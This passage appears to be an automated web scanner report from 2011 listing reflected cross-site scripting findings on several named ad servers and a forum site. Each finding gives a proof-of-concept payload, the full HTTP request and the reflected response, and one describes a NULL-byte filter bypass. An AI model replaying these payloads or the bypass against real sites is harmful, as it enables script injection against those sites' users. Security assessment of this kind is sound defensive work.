P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:21:11 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289667c52ae<script>alert(1)</script>e41adc6af97".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_289667c52ae<script>
...[SNIP]...

4.8. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f1'-alert(1)-'63a73adbc30 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90353f1'-alert(1)-'63a73adbc30&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:35 GMT
Content-Length: 616

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90353f1'-alert(1)-'63a73adbc30&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5
...[SNIP]...

4.9. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 939d5'-alert(1)-'00990139a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1712152939d5'-alert(1)-'00990139a3b HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:39 GMT
Content-Length: 616

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152939d5'-alert(1)-'00990139a3b&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U
...[SNIP]...

4.10. http://afreshbunch.com/files/com/call.asp [instance_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50b0"><script>alert(1)</script>1231ca00dba was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748c50b0"><script>alert(1)</script>1231ca00dba&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1488
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:10:10 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
3
<script>
function checkcomment(objValue)
{

if(eva
...[SNIP]...
<input type="hidden" name="page" value="http://afreshbunch.com//files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748c50b0"><script>alert(1)</script>1231ca00dba&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2">
...[SNIP]...

4.11. http://afreshbunch.com/files/com/call.asp [lastpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload c8b61<script>alert(1)</script>2cde569026c was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypassc8b61<script>alert(1)</script>2cde569026c&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 305
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSQABRTT=HANPHPADFHDBFMACNLNHMNBO; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:27:08 GMT


//document.write("<textarea></textarea>")
//document.write("<br><textarea>/forums/default.asp?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1&cachecommand=bypassc8b61<script>alert(1)</script>2cde569026c</textarea>
...[SNIP]...

4.12. http://afreshbunch.com/forums/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ab"><script>alert(1)</script>1bee2ef731a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/?page=t&sa=recent&d=3&940ab"><script>alert(1)</script>1bee2ef731a=1 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17140
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:33:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSQABRTT=KODBIPADLLFMGKOOHICPDFJI; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:34:28 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<a href="/forums/?sa=mine&page=t&d=3&940ab"><script>alert(1)</script>1bee2ef731a=1&cachecommand=bypass">
...[SNIP]...

4.13. http://afreshbunch.com/forums/ [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003bd70"><script>alert(1)</script>a70dc90eb4a was submitted in the page parameter. This input was echoed as 3bd70"><script>alert(1)</script>a70dc90eb4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /forums/?page=t%003bd70"><script>alert(1)</script>a70dc90eb4a&sa=recent&d=3 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17138
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:09:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:10:26 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<a href="/forums/?sa=mine&page=t%003bd70"><script>alert(1)</script>a70dc90eb4a&d=3&cachecommand=bypass">
...[SNIP]...

4.14. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 24105<script>alert(1)</script>d1dfb28578f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction24105<script>alert(1)</script>d1dfb28578f&n=ar_int_p97174789&1303827696143 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303827675%2E212%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:27 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction24105<script>alert(1)</script>d1dfb28578f("");

4.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b413'><script>alert(1)</script>4a29843458a was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D1b413'><script>alert(1)</script>4a29843458a HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001j2VeaGye07aw00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:38 GMT
Connection: close
Content-Length: 3364

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BAF092D3EB42D7C0&idh=e18a41658ec9c9c740dc1b91edbc4646&pvu=59196390591647FA9372FACB8C10DBA5&pvm=35e167e1c66fee62be98fe397190a726&uf=0&ur=0&llip=0&ttv=1&redir=1b413'><script>alert(1)</script>4a29843458ahttp%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2423626%26Page=%26PluID=0%26EyeblasterID=4992590%26Pos=40659133448784%26ord=%5btimestamp%5d' target='_blank'>
...[SNIP]...

4.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0f14</script><script>alert(1)</script>21c15be81c4 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3Df0f14</script><script>alert(1)</script>21c15be81c4 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001j2VeaGye07aw00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:38 GMT
Connection: close
Content-Length: 3385

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
